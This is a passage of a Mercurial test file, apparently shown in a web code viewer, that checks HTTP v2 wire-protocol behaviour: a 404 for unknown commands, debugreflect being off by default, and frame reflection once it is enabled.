305 s> Content-Type: text/plain\r\n
306 s> Content-Length: 18\r\n
306 s> Content-Length: 18\r\n
307 s> \r\n
307 s> \r\n
308 s> rw/customreadonly\n
308 s> rw/customreadonly\n
309
309
310 Authorized request for unknown command is rejected
310 Authorized request for unknown command is rejected
311
311
312 $ send << EOF
312 $ send << EOF
313 > httprequest POST api/$HTTPV2/rw/badcommand
313 > httprequest POST api/$HTTPV2/rw/badcommand
314 > user-agent: test
314 > user-agent: test
315 > accept: $MEDIATYPE
315 > accept: $MEDIATYPE
316 > EOF
316 > EOF
317 using raw connection to peer
317 using raw connection to peer
318 s> POST /api/exp-http-v2-0001/rw/badcommand HTTP/1.1\r\n
318 s> POST /api/exp-http-v2-0001/rw/badcommand HTTP/1.1\r\n
319 s> Accept-Encoding: identity\r\n
319 s> Accept-Encoding: identity\r\n
320 s> accept: application/mercurial-exp-framing-0001\r\n
320 s> accept: application/mercurial-exp-framing-0001\r\n
321 s> user-agent: test\r\n
321 s> user-agent: test\r\n
322 s> host: $LOCALIP:$HGPORT\r\n (glob)
322 s> host: $LOCALIP:$HGPORT\r\n (glob)
323 s> \r\n
323 s> \r\n
324 s> makefile('rb', None)
324 s> makefile('rb', None)
325 s> HTTP/1.1 404 Not Found\r\n
325 s> HTTP/1.1 404 Not Found\r\n
326 s> Server: testing stub value\r\n
326 s> Server: testing stub value\r\n
327 s> Date: $HTTP_DATE$\r\n
327 s> Date: $HTTP_DATE$\r\n
328 s> Content-Type: text/plain\r\n
328 s> Content-Type: text/plain\r\n
329 s> Content-Length: 42\r\n
329 s> Content-Length: 42\r\n
330 s> \r\n
330 s> \r\n
331 s> unknown wire protocol command: badcommand\n
331 s> unknown wire protocol command: badcommand\n
332
333 debugreflect isn't enabled by default
334
335 $ send << EOF
336 > httprequest POST api/$HTTPV2/ro/debugreflect
337 > user-agent: test
338 > EOF
339 using raw connection to peer
340 s> POST /api/exp-http-v2-0001/ro/debugreflect HTTP/1.1\r\n
341 s> Accept-Encoding: identity\r\n
342 s> user-agent: test\r\n
343 s> host: $LOCALIP:$HGPORT\r\n (glob)
344 s> \r\n
345 s> makefile('rb', None)
346 s> HTTP/1.1 404 Not Found\r\n
347 s> Server: testing stub value\r\n
348 s> Date: $HTTP_DATE$\r\n
349 s> Content-Type: text/plain\r\n
350 s> Content-Length: 34\r\n
351 s> \r\n
352 s> debugreflect service not available
353
354 Restart server to get debugreflect endpoint
355
356 $ killdaemons.py
357 $ cat > server/.hg/hgrc << EOF
358 > [experimental]
359 > web.apiserver = true
360 > web.api.debugreflect = true
361 > web.api.http-v2 = true
362 > [web]
363 > push_ssl = false
364 > allow-push = *
365 > EOF
366
367 $ hg -R server serve -p $HGPORT -d --pid-file hg.pid -E error.log
368 $ cat hg.pid > $DAEMON_PIDS
369
370 Command frames can be reflected via debugreflect
371
372 $ send << EOF
373 > httprequest POST api/$HTTPV2/ro/debugreflect
374 > accept: $MEDIATYPE
375 > content-type: $MEDIATYPE
376 > user-agent: test
377 > frame command-name have-args command1
378 > frame command-argument 0 \x03\x00\x04\x00fooval1
379 > frame command-argument eoa \x04\x00\x03\x00bar1val
380 > EOF
381 using raw connection to peer
382 s> POST /api/exp-http-v2-0001/ro/debugreflect HTTP/1.1\r\n
383 s> Accept-Encoding: identity\r\n
384 s> accept: application/mercurial-exp-framing-0001\r\n
385 s> content-type: application/mercurial-exp-framing-0001\r\n
386 s> user-agent: test\r\n
387 s> content-length: 42\r\n
388 s> host: $LOCALIP:$HGPORT\r\n (glob)
389 s> \r\n
390 s> \x08\x00\x00\x12command1\x0b\x00\x00 \x03\x00\x04\x00fooval1\x0b\x00\x00"\x04\x00\x03\x00bar1val
391 s> makefile('rb', None)
392 s> HTTP/1.1 200 OK\r\n
393 s> Server: testing stub value\r\n
394 s> Date: $HTTP_DATE$\r\n
395 s> Content-Type: text/plain\r\n
396 s> Content-Length: 291\r\n
397 s> \r\n
398 s> received: 1 2 command1\n
399 s> ["wantframe", {"state": "command-receiving-args"}]\n
400 s> received: 2 0 \x03\x00\x04\x00fooval1\n
401 s> ["wantframe", {"state": "command-receiving-args"}]\n
402 s> received: 2 2 \x04\x00\x03\x00bar1val\n
403 s> ["runcommand", {"args": {"bar1": "val", "foo": "val1"}, "command": "command1", "data": null}]\n
404 s> received: <no frame>
405
406 $ cat error.log
General Comments 0
You need to be logged in to leave comments. Login now